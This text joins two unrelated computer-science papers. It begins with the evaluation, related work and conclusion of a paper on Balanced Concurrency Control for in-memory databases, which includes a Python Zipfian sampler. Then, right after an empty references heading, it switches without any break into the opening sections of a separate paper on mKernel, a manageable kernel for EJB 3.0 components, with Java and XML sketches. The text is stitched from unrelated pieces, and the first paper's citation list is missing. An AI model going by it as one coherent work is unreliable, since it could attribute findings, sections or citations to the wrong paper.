As can be seen from Figure 9, BCC performs better than both OCC and 2PL when the number of threads is 8 or greater. With 32 threads, BCC's throughput is 1.99x that of OCC and 1.63x that of 2PL. The reasons for the different performance behaviors are similar to those in the previous high-contention benchmarks: BCC's improvement over OCC comes from its reduction of unnecessary transaction aborts, while BCC outperforms 2PL because of 2PL's high synchronization cost and lock-thrashing behavior.
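The skewed access pattern used in this workload can be reproduced with a simple Zipfian sampler. This is a CDF-inversion sketch, not YCSB's actual generator [7], which uses a more efficient closed-form method; note that with $\theta$ as large as 100, virtually all probability mass falls on the hottest item.

```python
import bisect
import random

def zipfian_sampler(n, theta, rng=random):
    """Return a function that samples item ids in [0, n) with Zipfian skew:
    P(i) proportional to 1 / (i + 1) ** theta."""
    weights = [1.0 / (i + 1) ** theta for i in range(n)]
    total = sum(weights)
    cdf, acc = [], 0.0
    for w in weights:
        acc += w / total
        cdf.append(acc)
    # Invert the CDF with binary search; clamp guards against float rounding.
    return lambda: min(bisect.bisect_left(cdf, rng.random()), n - 1)
```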
6.3 Memory Consumption and Latency
BCC improves transaction throughput by detecting the essential patterns, at the cost of additional memory usage and extra operations. In this part we examine BCC's memory consumption and its impact on transaction latency.
Memory Consumption. With BCC, each thread maintains a memory area to store (1) a list of entries for recent history transactions, and (2) the hash tables of these transactions needed for detecting the essential patterns.
The size of the saved history hash tables determines the memory consumption of BCC. For a given workload with a fixed number of threads, this overhead is usually stably low. Figure 10 shows the average and maximum sizes of memory occupied by history hash tables in each thread when executing the TPC-C NewOrder and Payment workload mix used in the previous subsection. The average per-thread memory consumption stays below 56KB consistently across all thread counts, with the maximum not exceeding 1.6MB. The large gap between average and maximum consumption is caused by the conservative hash-table release mechanism, which achieves good performance but relies on the progress of all database threads to determine when a hash table can be released: by the time a transaction T's hash table is released, T's concurrent transactions may have already finished for some time. Similar results are observed with the other workloads used in our experiments.
In our experiments we set the number of entries in each history hash table to 16K and the total size of memory for storing history hash tables to 4MB, which is more than enough for all the workloads in our experiments. This brings BCC's total memory consumption per thread to about 4.38MB, which is negligible compared with the tens to hundreds of gigabytes of memory on a typical enterprise server. This also justifies BCC's design of using one hash table per transaction for the benefit of performance with low-contention workloads.
Latency. To illustrate how BCC affects transaction execution latency, we divide the NewOrder transactions processed with BCC in the previous experiment into the following three categories: (1) transactions that are committed with OCC’s validation criterion; (2) transactions that are aborted even after BCC checks; and (3) transactions that are aborted with OCC but committed with BCC. These three types of transactions do not overlap.
For the first type of transactions, BCC's overhead mainly consists of memory management and accessing the global clock, similar to the low-contention case discussed in Section 6.1. Transactions of the second type are aborted by both OCC and BCC; besides memory management and global-clock operations, BCC performs extra data-dependency checking before aborting them. Figure 11 shows the total latency of each aborted NewOrder transaction in this case. BCC increases the latency by up to 26% with 32 threads. However, since the database must clean up an aborted transaction for re-execution anyway, this extra latency is negligible relative to the overall cost of an abort.
For the third type of transactions, BCC commits a transaction that would otherwise be aborted by OCC (i.e., BCC saves the transaction). This comes at the cost of increased latency, because the database thread must validate the transaction's write set against the history hash tables on other threads. Figure 12 shows the latency of transactions of this type, compared with transactions that OCC commits. As can be seen, the latency of a transaction saved by BCC is almost twice that of one committed by OCC. However, this overhead is acceptable for two main reasons. First, in high-contention scenarios, an OCC-aborted transaction may be aborted several times before it can actually commit; considering the high cost of transaction re-executions, the latency of BCC-saved transactions is often justified. Second, the increased latency is still within tens of microseconds, which is sufficiently small for most real-world applications.
7. RELATED WORK
Partial dependency detection. The idea of detecting partial graph cycles to guarantee serializability was first proposed for the snapshot isolation concurrency control method [5, 11]. Snapshot isolation (SI) has been implemented in major database systems, such as Oracle and PostgreSQL. SI guarantees that read and write transactions do not block each other, increasing system throughput. However, Fekete et al. [12] showed that SI cannot guarantee transaction serializability, and Fekete et al. [11] further identified a data dependency pattern (the dangerous structure) that always appears when transactions cannot be serialized under SI. Cahill et al. [5] demonstrated how to implement detection of the dangerous structure in Berkeley DB; Ports et al. [24] further optimized this method for PostgreSQL; and Han et al. [14] further optimized SI for multicore systems. BCC's essential patterns contain different data dependencies than the dangerous structure, a consequence of the different record visibilities of SI and the optimistic concurrency control model: in SI a transaction cannot see writes that happen after the transaction starts, whereas in BCC any data dependency may exist between concurrent transactions. Moreover, BCC is designed and optimized for the short latencies encountered in main-memory OLTP workloads, not for disk-based implementations.
OCC for in-memory databases. The optimistic concurrency control (OCC) method was originally proposed by Kung and Robinson [17] and has been implemented in recent in-memory databases [18, 30, 31, 32]. These works mainly study how to efficiently implement the OCC method in in-memory databases. Larson et al. [18] proposed OCC for Microsoft SQL Server’s in-memory OLTP engine “Hekaton” [8] and compared the performance of OCC with two-phase locking. Their implementation of OCC used a centralized timestamp allocator. Silo [30] introduced an implementation of OCC without centralized bottlenecks which can achieve near-linear scalability for low contention workloads. Tran et al. [29] studied transaction behaviors on hardware transactional memory. Wang et al. [31] explored how to build high performance OCC for in-memory databases with hardware transactional memory. Yu et al. [32] studied the scalability of different concurrency control methods on up to 1024 cores with a simulator. Despite the implementation differences among these databases, their OCC-based nature unavoidably causes spurious false aborts.
OCC for distributed systems. Recently OCC has also been studied in distributed systems. Maat [19] re-designed OCC for distributed systems and removed the need of locking during two-phase commit. ROCOCO [20] broke transactions into atomic pieces and executed them out of order by tracking dependencies, which significantly outperformed OCC. In comparison, BCC focuses on transaction execution for single-node in-memory databases.
OLTP on modern hardware. Our design and implementation benefit from existing in-memory OLTP systems. Databases such as Hyper [16] and H-Store [15] adopt the partitioning approach to scale. Harizopoulos et al. [15] analyzed the overheads of the Shore database. Pandis et al. [22] eliminated the overhead of a centralized lock manager with partitioning. Porobic et al. [23] systematically compared the performance of shared-nothing and shared-everything OLTP system designs on multi-socket, multi-core CPUs. Faleiro et al. [10] redesigned the multiversion concurrency control method for in-memory databases by avoiding bookkeeping operations for reads and a global timestamp allocator, but their design requires all transactions to be submitted to the database before they can be processed.
Doppel [21] introduced an in-memory database designed for transactions that contend on the same data item. It proposed splitting the contended data item across cores so that each core can continue updating the item in parallel; the per-core values are reconciled before the data item can be read. Doppel's optimization is orthogonal to BCC: Doppel improves performance when *ww* dependencies occur, while BCC avoids false aborts caused by *rw* dependencies.
8. CONCLUSION
In this paper we have presented the Balanced Concurrency Control (BCC) mechanism for in-memory databases. Unlike OCC that aborts a transaction based on whether the transaction’s read set has changed, BCC aborts transactions based on the detection of essential patterns that will always appear in unserializable transaction schedules. We implemented BCC in Silo, a representative OCC-based in-memory database and comprehensively compared BCC with OCC and 2PL with TPC-W-like, TPC-C-like and YCSB benchmarks. Our performance evaluations demonstrate that BCC outperforms OCC by more than 3x and 2PL by more than 2x when data contention is high; meanwhile, BCC has comparable performance to OCC in low-contention workloads.
9. ACKNOWLEDGEMENTS
We thank the anonymous reviewers for their constructive comments. The work was supported in part by the National Science Foundation under grants OCI-1147522, CNS-1162165, and CCF-1513944.
10. REFERENCES
mKernel: A manageable kernel for EJB-based systems
Jens Bruhn
Distributed and Mobile Systems Group
Feldkirchenstr. 21
96052 Bamberg, Germany
jens.bruhn@wiai.uni-bamberg.de
Guido Wirtz
Distributed and Mobile Systems Group
Feldkirchenstr. 21
96052 Bamberg, Germany
guido.wirtz@wiai.uni-bamberg.de
ABSTRACT
Due to the ever-increasing complexity of today's Enterprise Applications (EA), component technology has become the major means to keep the development of such applications under control. Although container technology provides tools to deploy component-based EAs, high demands regarding, e.g., availability, security and fault-tolerance, combined with constantly changing user demands, varying loads and rapid change of business processes, introduce the need for adjusting systems in regular intervals without halting, restructuring and re-deploying the system as a whole. Consequently, the administration of EAs is a very complex task which has to be performed during runtime of the managed system. Hence, techniques from the area of Autonomic Computing (AC) that allow for controlling and changing a running system without the need to go back to development can become highly useful. This paper presents the design rationale and overall architecture of a manageable kernel that equips the broadly accepted Enterprise Java Beans 3.0 (EJB) component standard for enterprise applications with additional facilities in order to make EJB components AC-manageable at runtime. The system is realized in an EJB 3.0-compliant fashion and provides container infrastructure enhancements as well as a tool for adapting standard EJB components.
Keywords
Enterprise Applications, EJB, Management, mKernel
1. INTRODUCTION
Enterprise Applications (EA) represent a family of very complex software systems used for supporting the business of companies. Their complexity emerges from the different application areas within which they are used in combination with a high degree of interrelation among those areas, e.g. ordering and warehousing. Additionally, the environment of an EA constantly changes due to strategic and operative aspects. An EA might on the one hand be extended to integrate solutions for demands arising from new business areas of the operating company. On the other hand, certain parts of an application might be deactivated in case they should no longer be provided. If workload increases, decreases, or shifts, administrators of an EA might face the need to reorganize the system in response. Certain parts of an EA might be provided to external users, e.g. to suppliers or customers. Especially those parts must be isolated and protected to a very high degree regarding security aspects. Types of threats will probably change over time, leading to constant administrative demand. The manifold areas of possible adjustments, in combination with the inherent complexity of such systems, render the task of administration very complex. Additionally, the very high demands on availability of EAs lead to the need to perform adjustments of a system during runtime. A complete system shutdown in combination with an offline re-configuration would be very costly and probably lead to a loss of reputation, even when the downtime is very short. Consequently, this option seems to be unacceptable, especially if it has to be carried out in more or less regular intervals.
The concept of Component Orientation (CO) [22] represents one approach for establishing a software system in a modular way. The modules a system is built from, called Components, encapsulate functionality and expose it through well-defined Interfaces to their environment. In return they can make use of other components through their provided interfaces. An interface required by a component is called Receptacle. Consequently, a component-based system can be seen as a collection of loosely-coupled modules which collaborate with each other through their interfaces. Therefore, different functional aspects of a system can be treated in isolation and a modular design of software systems is promoted. Normally, a component is developed with respect to a certain Component Standard. A standard defines different obligations regarding the implementation of components. In return, a component implementation can rely on concepts provided by the standard. Besides other aspects, e.g. the target programming language or application area, component standards differ with respect to the number and type of included features. While some standards might only standardize formats for message exchange, others might also include specifications for services and facilities, or deployment formats for components. An implementation of a component standard is called Component Platform. A platform must implement at least all recommended parts of the underlying standard and can realize the optional ones. Moreover, it is possible to enhance the underlying standard with additional features. Relying on
optional or non-standard features for the development of components imposes the risk for the implementation of not being usable with all standard-compliant platforms. Typically, a platform includes a runtime environment for components, called Container, which provides the services and facilities of the corresponding standard. One broadly accepted standard for component-oriented EA systems based on the Java programming language is the Enterprise Java Beans-standard (EJB), currently available in version 3.0 [8, 9]. This standard provides a reasonable component-model and a rich set of services and facilities, e.g. for persistence management and transaction control. Additionally, the isolated treatment of different aspects – e.g. application logic and security – allows separation of concerns for development, execution, and administration.
While the concept of CO facilitates the development and initial configuration of complex systems, the vision of Autonomic Computing (AC) [13, 16, 18] was developed to find a solution for handling the constantly increasing complexity of today's and future computer systems during runtime. Its main idea relies on the assignment of low-level administrative tasks to the managed system itself. A promising approach for addressing the complexity of EAs during development and runtime could consequently be to bring together the concepts of CO with the vision of AC. Therefore, a component platform must be enhanced with facilities and services allowing managing entities to gather information about the structure and behavior of the underlying component-based EA. Additionally, the manipulation of the component system must also be supported. The enhancements should be highly generic to ensure that they can be used in many contexts with respect to self-management properties [21].
Within this paper we discuss a system of component-based enhancements on top of the EJB 3.0 standard, called mKernel. It can be used to establish a sound and extensible foundation for AC in the context of EAs. The system is realized through a set of components which can be deployed into an EJB-compliant container. The main contribution of mKernel lies in its platform-specific approach of providing a generic manageable layer for applications developed for the considered platform. It enables the provision of facilities for monitoring and re-configuration on a unified foundation. Compared to existing platforms for AC like [12, 14], mKernel is not intended to be used for managing different types of resources. Because it is platform-specific, it is possible to rely on guidelines of a standard which enable the realization of very fine-grained and rich opportunities for analysis and control in a homogeneous fashion. Unified sensors and effectors avoid the need to address the characteristics of different types of managed resources, thus reducing complexity for the management layer. Manageability is integrated into managed resources automatically.
Therefore, autonomic management need not be considered for the core application logic, and development is facilitated. Moreover, mKernel is intended to control the participating components of the managed layer on a low level for providing a very high degree of re-configuration freedom. Domain-specific approaches for the Java Enterprise Edition like [3, 4] address the management of J2EE-based systems on deployment level. In contrast, mKernel focuses on the detailed management of components during runtime. Moreover, our realization does not require any adjustment of the underlying container implementation.
The remainder of this paper is structured as follows: Section 2 discusses the different requirements of AC addressed by the presented system. To get a grip on the advantages and shortcomings of the underlying component-standard, section 3 briefly introduces those parts of the EJB-standard that are essential for the presented system. In section 4 the architecture of the constituting components for autonomic management as well as the enhanced facilities needed are discussed. Necessary extensions to EJB components are treated in section 5. Afterwards, mKernel is evaluated against the requirements stated in section 2, and the results of first performance evaluations of the implementation are discussed in section 6. The paper concludes with a summary and a discussion of future work in section 7.
2. REQUIREMENTS
With his paper [16], Paul Horn established the foundation for the vision of AC. As part of this paper, eight recommended characteristics are stated for AC-systems, i.e. Anticipatory, Self-Healing, Self-Protection, Self-Optimization, Self-Configuration, Self-Awareness, Context-Awareness, and Openness. While there is no terminological consensus regarding these AC characteristics in literature yet, this core collection has broadly been adopted [19]. Anticipatory addresses the ability of an AC-system to anticipate the goals of its users. The four following characteristics are merely Objectives to reach the superior goal of Self-Management [18, 21]. They cover reactions of the system to certain situations, like e.g. failures (Self-Healing), attacks (Self-Protection), or varying resource needs (Self-Optimization). In this context Self-Configuration can be seen as generic, supporting the others via facilities for adjusting the system accordingly. Self-Awareness and Context-Awareness both address the information demand of an AC-system to fulfill its duties. While the first one considers the introspection into the internals of the system, the second one addresses the need to gather information about its environment. Finally, Openness can be seen as a generally desirable property for AC-systems, i.e. an AC-system should be based upon open standards in contrast to being proprietary.
While the aforementioned characteristics deal with the question of what an AC-system should be capable of, the so-called Control Loop represents a concept for realizing these characteristics [10, 18]. It consists of the four stages as shown in figure 1. The first stage (monitor) includes all steps of information discovery addressing Self-Awareness and Context-Awareness. Secondly (analyze), the gathered information is analyzed regarding aspects of aggregation and detection of situations making modifications of the system necessary. In case the need for re-configuration is identified, the third stage (plan) assembles a collection of operations to transfer the system from the current into the desired state which should better fulfill the Objectives of the autonomic system. Finally (execute), these operations are performed. During execution of a control loop-cycle, internal Knowledge is used which e.g. covers information about symptoms of malicious behavior and options for re-configuration. It has to be pointed out that the control loop is not a one-way process. It is e.g. also conceivable that – during planning – additional information is needed which must be obtained from the managed system or its environment. This may lead to a selective execution of the monitor- and maybe the analyze-stage. Consequently, an autonomic system conceptually consists of two main layers. The original services a system provides to its users are allocated inside a Managed Layer which is supervised and manipulated by the Management Layer. Interaction with the managed layer takes place at the first and the last stage of the control loop. During monitoring, information is obtained via so-called Sensors while during execution Effectors are applied for re-configuration. Figure 1 also covers the interaction with the environment of the considered system during these stages of the control loop. This environment might also contain other autonomic systems. There are also architectures conceivable that make coordination among planning entities of different Management Layers necessary, like e.g. [6]. These are not covered explicitly in figure 1.
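The four stages and their interaction with sensors and effectors can be sketched in plain Java. All names here are illustrative; this is not part of mKernel's actual API, and the "analysis" and "plan" steps are reduced to a trivial threshold policy:

```java
import java.util.ArrayList;
import java.util.List;

interface Sensor { int read(); }                 // monitor: pull-style sensor
interface Effector { void apply(String op); }    // execute: re-configuration

class ControlLoop {
    private final Sensor sensor;
    private final Effector effector;
    final List<String> log = new ArrayList<>();

    ControlLoop(Sensor sensor, Effector effector) {
        this.sensor = sensor;
        this.effector = effector;
    }

    /** Runs one cycle and reports whether a re-configuration was executed. */
    boolean cycle(int threshold) {
        int load = sensor.read();                   // monitor
        boolean overloaded = load > threshold;      // analyze
        if (!overloaded) return false;
        String plan = "add-replica";                // plan (trivial policy)
        effector.apply(plan);                       // execute
        log.add(plan);
        return true;
    }
}
```

A real loop would consult the internal Knowledge during the analyze and plan stages, and could fall back to selective monitoring as described above.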
To provide a foundation for autonomic management of component-based EA systems, a manageable layer must be established on top of an existing component standard. The remainder of this section discusses three different classes of requirements for such a manageable layer: Manageability Requirements ensure sufficient functionality of the layer itself. Platform Requirements prevent the system from becoming proprietary. Development Requirements address the desired property of an AC-platform to hide manageability aspects from developers of the original business logic by means of preventing them from the need to program in a manner that is explicitly aware of manageability issues. Whereas the first class guarantees the overall functionality of the system, the latter ones should ease its wide-spread use for different containers as well as for existing components.
Manageability Requirements (MR) subsume all requirements directly related to the provided functionality for the management layer. Because they are essential for the establishment, they are indispensable.
MR-1: The manageable kernel must provide facilities or services to allow the management layer to gather information about the structure of managed EAs. This covers the constituting components and connections among them. The requirement is subsumed under the term structural inspection.
MR-2: Support for behavioral inspection must also be part of a manageable kernel. Interactions among components inside a container and across its boundaries must be observable in a fine-grained fashion. This covers not only the occurrence of method calls themselves but also information about call chains, potentially spanning multiple participating components.
MR-3: While structural inspection mainly address static aspects of the managed layer, behavioral inspection deals with dynamic aspects regarding the occurrence of different situations. To address the particular specifics of the different kinds of inspection, a manageable kernel should provide pull- and push-oriented information provision. While the former type involves information acquisition via the usage of different sensor-interfaces, the latter type relies on information supply through invocation of callback methods or capturing of events. A pull-oriented approach is desirable for obtaining static information, e.g. the set and structure of deployed components. For the occurrence of situations, e.g. the invocation of a method, push-oriented information of the management layer is preferable, both for timeliness- and performance reasons. Otherwise, the management layer has to poll for the occurrence of relevant situations in regular intervals. This would imply the risk of missing them.
MR-4: A managed layer must support a management layer with a rich set of opportunities for structural re-configuration of EAs during runtime. This covers the possibility to re-organize the internal architecture of an application via re-connecting its parts. Re-configuration should be supported on component- and instance-level, meaning that it should be possible to apply manipulation-instructions generally or for a concrete connection.
MR-5: In addition to the previous requirement which deals with the establishment of new connections, behavioral rerouting addresses the need to manipulate already existing connections. For this purpose it must be possible to re-route the invocation of a certain method to a new target. In case certain parts of the system should be isolated or protected, a manageable kernel must additionally provide the possibility to prevent the execution of incoming or outgoing method calls.
In summary, the previous requirements together address the need to support structural and behavioral reflection [20].
MR-6: The information used in the context of the previous requirements has to be based on a sound information model. It should be possible to identify related parts for information items and to put them into a context like, e.g. identifying the source of a method-call. Additionally, a relation must be established between the information obtained from sensors and the information needed at effectors.
MR-7: Extensibility is needed for the collection of provided sensors and effectors to cope with future needs. While a manageable kernel should provide a degree of manageability as high as possible, one must expect that the included facilities and services are not sufficient for all considerable future application areas. It should be possible to integrate extensions during runtime to prevent the need for a restart of a productive system. Furthermore, potential extensions should get by without any adjustments of certain components of the affected applications which would result in the need to un-deploy, adjust, and redeploy them. In particular, a solution which implies a partial or complete reboot of EAs would be unacceptable.
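The contrast between pull- and push-oriented information provision demanded by MR-3 can be illustrated with two hypothetical sensor interfaces; neither is mKernel's real API:

```java
import java.util.ArrayList;
import java.util.List;

// Pull: the management layer asks for a snapshot when it needs one.
interface StructureSensor {
    List<String> deployedBeans();
}

// Push: the managed layer notifies registered consumers on occurrence.
interface CallListener {
    void methodInvoked(String bean, String method);
}

class InstrumentedBean {
    private final List<CallListener> listeners = new ArrayList<>();
    void register(CallListener l) { listeners.add(l); }
    void businessMethod() {
        // ... application logic would run here ...
        for (CallListener l : listeners)    // push notification
            l.methodInvoked("InstrumentedBean", "businessMethod");
    }
}
```

With the push style, no invocation can be missed between polling intervals, which is exactly the timeliness argument of MR-3.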
Platform Requirements (PR) include two aspects for broad usability of a provided kernel.
PR-1: For integration of autonomic management facilities, there should be no need for adjusting the implementation of the underlying platform and its corresponding container. Otherwise – in case a concrete implementation is manipulated – each new release has to be adjusted accordingly. Moreover, the solution would be limited to a concrete container implementation for the addressed component-standard.
PR-2: No use of specific platform- or container-provided enhancements is permitted. This should lead to the usability of the kernel inside many environments. Similar to the previous requirement, the use of container-specific APIs or services as well as relying on optional parts of a standard provided by some containers would lead to a commitment to a concrete implementation which is not desirable. In summary, these requirements postulate that the integration of manageability should solely rely on the underlying component-standard. Basically, a violation of one of these requirements points out shortcomings in the implementation of the kernel or indicates that the underlying standard does not specify all aspects needed for the establishment of a manageable kernel.
Development Requirements (DR) address the development stage of the lifecycle of components and the influence of the manageable kernel onto their execution. Their fulfillment should support its acceptance.
DR-1: The insertion of sensors and effectors into components should be transparent for developers, i.e., developers are not responsible for ensuring manageability of their applications, e.g., via the usage of a recommended API. Generally, the integration of capabilities for autonomic management into containers as well as into components should not hinder the tasks of developers.
DR-2: No limitations regarding the use of services and facilities provided by the standard should be imposed on developers. They should be enabled to develop components as if there is no autonomic management performed.
DR-3: For the management of components there should exist no additional information needs. Consequently, a developer should not be enforced to write additional artifacts besides those recommended by the underlying component standard. Note that this requirement only refers to the basic aspects covered by a kernel. It does not imply that it should be generally avoided to include additional information about entities being target of autonomic management. This might be reasonable for concrete application areas of AC, but the fulfillment of the generic manageability requirements should get by without them.
DR-4: The preparation of components should be automated to a very high degree. It should be possible to provide a standard-compliant, deployment-ready component for which the integration of enhancements should be performed automatically.
DR-5: For the integration of a component into a container no complicated deployment process should be needed. Instead of that, the deployment should be realizable as intended by the provider of the original target container.
3. ENTERPRISE JAVA BEANS 3.0
Enterprise Java Beans represent a standard for distributed, component-oriented EAs implemented with the object-oriented programming language Java. The slogan Write Once, Run Anywhere (WORA) [8, p. 27] stands for two main goals of the development of the standard, namely interoperability and re-usability. It means that a component should be deployable into each container following the EJB-standard without any need to modify its source code. Version 3.0 of the standard has been available since May 2006. In [9] aspects of persistence management are covered which are of minor relevance for the kernel presented here. Therefore, [8] was considered as foundation for this paper, which includes all aspects relevant for development, deployment and runtime of components. The standard was specified under the leadership of Sun Microsystems and is supported by well-known companies, e.g., IBM Corporation and Oracle Corporation. In the following, different aspects of the EJB 3.0 standard are discussed as far as they are relevant for the implementation of mKernel.
Building Blocks of Components: EJB-based components consist of a collection of so-called Enterprise Beans, or Beans for short. The standard considers three different types of beans: Message Driven Beans, Stateless Session Beans, and Stateful Session Beans. Message driven beans can be used via sending asynchronous messages and provide no additional interfaces. Session beans provide interfaces, of which the standard considers different types. The main difference between the two types of session beans lies in the provision of a client-specific state. Instances of stateful session beans are exclusively used by a single client and retain their state across multiple invocations. Consequently, this state is specific to a single client. Moreover, a client can rely on interacting with the same instance in case it uses the same reference for multiple invocations. Stateless session beans, in contrast, are usable by the container for handling method invocations originating from different clients. Furthermore, it is not guaranteed that a client performing more than one method invocation on the same reference is always interacting with the same session bean instance. An instance might keep its state during its lifetime. This client-neutral state might be the source of performance benefits, e.g., in case an open database connection is kept for reuse. One important property of session beans is that they are by definition non-reentrant. Therefore, it is not possible that more than one method call is active on a session bean instance at any given time. Moreover, bean instances are not allowed to perform any kind of thread handling, such as starting new threads. A component is provided in terms of a so-called Bean-module. Besides the constituting beans, such a module covers additional artifacts like, e.g., a Deployment Descriptor (DD).
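The difference in instance handling can be mimicked in plain Java. The mock container below is a deliberately simplified sketch (no pooling beyond a single shared instance, no real EJB APIs) of the assumed semantics:

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Stateful flavour: conversational state, one instance per client.
class ShoppingCartBean {
    private final List<String> items = new ArrayList<>();
    void add(String item) { items.add(item); }
    int size() { return items.size(); }
}

// Stateless flavour: no client-specific state, shareable across clients.
class PriceServiceBean {
    int priceOf(String item) { return item.length(); } // dummy logic
}

class MockContainer {
    private final Map<String, ShoppingCartBean> statefulByClient = new HashMap<>();
    private final PriceServiceBean pooled = new PriceServiceBean(); // "pool" of size 1

    ShoppingCartBean cartFor(String clientId) {
        // each client gets (and keeps) its own stateful instance
        return statefulByClient.computeIfAbsent(clientId, c -> new ShoppingCartBean());
    }
    PriceServiceBean priceService() {
        return pooled;   // any client may be handed any pooled instance
    }
}
```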
Component Composition: For gaining access to session beans and their interfaces, the container must – according to the standard – provide two alternative facilities which can be used in combination. On the one hand, an implementation of the Java Naming and Directory Interface (JNDI) [2] must be provided by each container which enables the lookup of bean references during runtime by submitting their name. It has to be pointed out that the entries of this naming facility cannot be manipulated directly. On the other hand, in the context of the so-called Dependency Injection, dependencies of enterprise beans can be declared during development. This, amongst others, also covers the specification of receptacles. During execution, these are bound to a concrete session bean instance.
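The two composition mechanisms can be reduced to a toy stand-in: a JNDI-style registry looked up by name, and a container step that binds a declared receptacle before the bean's usage phase begins. All names (`java:module/WarehouseBean`, the classes) are illustrative:

```java
import java.util.HashMap;
import java.util.Map;

// JNDI-style naming: lookup by name; entries are managed by the container.
class NamingRegistry {
    private final Map<String, Object> entries = new HashMap<>();
    void bind(String name, Object ref) { entries.put(name, ref); }
    Object lookup(String name) { return entries.get(name); }
}

class OrderBean {
    Object warehouse;            // declared receptacle, filled by injection
}

class Injector {
    // The container resolves and injects the dependency; only afterwards
    // is the bean allowed to use the injected reference.
    static void inject(OrderBean bean, NamingRegistry naming) {
        bean.warehouse = naming.lookup("java:module/WarehouseBean");
    }
}
```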
Interaction Control: To each enterprise bean an arbitrary number of Interceptors can be attached, each of which includes a specification of the methods the interceptor is interested in. In case a method should be invoked upon a bean instance, the invocation is firstly directed to the matching interceptors, if any. These interceptors gain full control over the control flow and the submitted parameters. They might e.g. analyze or change parameters, or prevent the invocation from reaching its original target. The return value can also be subject of inspection and manipulation.
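The interception idea can be sketched as a chain in plain Java: each interceptor sees the invocation before the bean does and may either proceed or short-circuit it. This is a minimal model of the mechanism, not the EJB `InvocationContext` API:

```java
import java.util.List;

interface Invocation { Object proceed(); }
interface Interceptor { Object around(Invocation inv); }

class InterceptorChain {
    static Object invoke(List<Interceptor> interceptors, Invocation target) {
        Invocation next = target;
        // wrap from last to first so the first interceptor runs first
        for (int i = interceptors.size() - 1; i >= 0; i--) {
            final Interceptor ic = interceptors.get(i);
            final Invocation downstream = next;
            next = () -> ic.around(downstream);
        }
        return next.proceed();
    }
}
```

An interceptor that returns without calling `proceed()` blocks the call, which is exactly the hook mKernel-style effectors need for isolating beans.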
**Component Specification:** During implementation of a certain bean, developers can integrate different *Metadata-Annotations* into the source code for configuring the corresponding bean. It is e.g. possible to specify interfaces and receptacles as well as interceptors to attach. Through an XML-based DD, included in the component, it is possible to configure the beans of the corresponding component. The options for configuration cover all aspects of the metadata-annotations and open up additional opportunities on component-level, e.g. to attach a certain interceptor to all beans of a module. In case certain annotations refer to the same aspects of a bean as parts of the DD, the content of the DD takes precedence. Hence, it is possible to adjust the configuration of a component and its constituting beans without the need to manipulate their source code.
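A component-level interceptor binding of the kind mentioned above would, roughly, look like the following fragment of an EJB 3.0 `ejb-jar.xml` (the interceptor class name is illustrative):

```xml
<ejb-jar xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <assembly-descriptor>
    <interceptor-binding>
      <!-- "*" attaches the interceptor to all beans of the module -->
      <ejb-name>*</ejb-name>
      <interceptor-class>org.example.AuditInterceptor</interceptor-class>
    </interceptor-binding>
  </assembly-descriptor>
</ejb-jar>
```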
**Component Lifecycle:** After the development of the constituting beans is completed, they are assembled into a module. As preparation for its integration into the target container, a subsequent configuration can be performed upon the component. There is no procedure designated within the standard to adjust the configuration of a component during runtime. Consequently, deployment is the last point at which the configuration aspects discussed above can be specified for a given module. A re-configuration must be performed outside the container and applied via redeployment of the affected module.
**Lifecycle of Enterprise Bean Instances:** For the instantiation of beans the EJB-standard specifies a dedicated procedure. A detailed discussion of the corresponding states, methods, and the specifics for the different bean types is omitted here for brevity. It has to be pointed out that the injection of references for dependencies and the authorization to use them are performed in two separate, consecutive steps. Only after the injection phase has finished completely is the bean instance allowed to invoke operations upon the provided references. The beginning of the usage phase can optionally be identified by receiving the invocation of a so-called *PostConstruct*-method. No method invocations regarding its application logic will be forwarded to the bean instance before the usage phase has started. All other state transitions during the lifecycle of a bean instance are observable through similar method invocations, too. Moreover, all of these invocations are firstly directed to interested interceptors attached to the instance, if any.
Within the EJB-standard there are no subordinate aspects included which allow the supervision of the current state of a container regarding instances of beans, established connections among them, or ongoing method invocations. Moreover, it is not intended to re-configure components after their deployment.
## 4. ARCHITECTURE
This section presents the architecture of *mKernel* and the different components which have to be integrated into a container for making it ready for autonomic administration according to the requirements discussed in section 2. *mKernel* was built and tested on top of the *Glassfish Application Server* [1], which provides, amongst others, facilities for the *Java Platform Enterprise Edition*, includes an EJB container, and has proven to be compliant with the EJB standard to a very high degree. Therefore, it was considered a good foundation for the development. The facilities presented here are realized as standard-compliant EJB modules and make use of the infrastructure provided by the container.
**Naming:** The implementation of JNDI, which is mandatory for each EJB-compliant container, is used to look up references to session bean instances via submitting their name. Because *mKernel* is developed for usage in a multi-container environment, the lookup of session bean instances residing in a remote container is also supported. Regarding this aspect, the EJB-standard has a shortcoming in that there is no standard-compliant way specified for dynamically accessing a session bean instance residing in a remote container through its *Remote Business Interface*. In fact, the *Glassfish Application Server* does not even provide a container-specific opportunity for dynamic connection establishment for this type of interface across container boundaries. Because remote business interfaces are the preferable choice for using the application logic of session beans, a solution had to be found. As foundation for naming, the *dyName* system was applied, which we developed as an independent solution for dynamic naming in EJB-based systems. *dyName* provides, amongst others, the required functionality. It is solely based on facilities specified by the EJB-standard, requires no enhancements of the applied container, and is encapsulated inside *mKernel*. Consequently, the application of *dyName* does not violate any of the requirements stated in section 2. For a detailed discussion of *dyName*, refer to [5]. The *Naming* facility is neither a sensor nor an effector but is used as infrastructure for connection establishment.
**Connector:** While the *Naming* facility enables the actual establishment of connections, the *Connector* facility supports the specification of targets for connections during runtime. A request is submitted to the *Connector* including the originator of the request and a target mapped name as used for connection establishment in the context of the EJB-standard. As response the *Connector* delivers information processable by the *Naming* facility. Managing entities can define connection targets on different granularity levels, namely on container-, module-, bean- and instance level. Moreover, the *Connector* also provides the opportunity to re-route existing connections. In combination, this allows fine-grained steering of the interactions taking place among managed beans. The *Connector* does not support any kind of state transfer from the original to the new target of a connection, which would be especially critical in case a connection to a stateful session bean instance should be switched. We consider this to be application-specific and not solvable in a generic fashion. Consequently, the *Connector* facility is an effector that provides a rich variety of options for controlling interconnections inside the managed layer, allowing the architecture of a component system to be re-configured during runtime.
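The "most specific granularity wins" idea behind the Connector can be sketched as a simple lookup cascade from instance over bean and module down to container level. The API below is hypothetical, not mKernel's actual interface:

```java
import java.util.HashMap;
import java.util.Map;

class ConnectorSketch {
    private final Map<String, String> targets = new HashMap<>();

    void define(String level, String key, String target) {
        targets.put(level + ":" + key, target);
    }

    /** Resolves a connection target, most specific definition first. */
    String resolve(String instance, String bean, String module) {
        for (String key : new String[] {
                "instance:" + instance, "bean:" + bean,
                "module:" + module, "container:default" }) {
            String t = targets.get(key);
            if (t != null) return t;      // most specific match wins
        }
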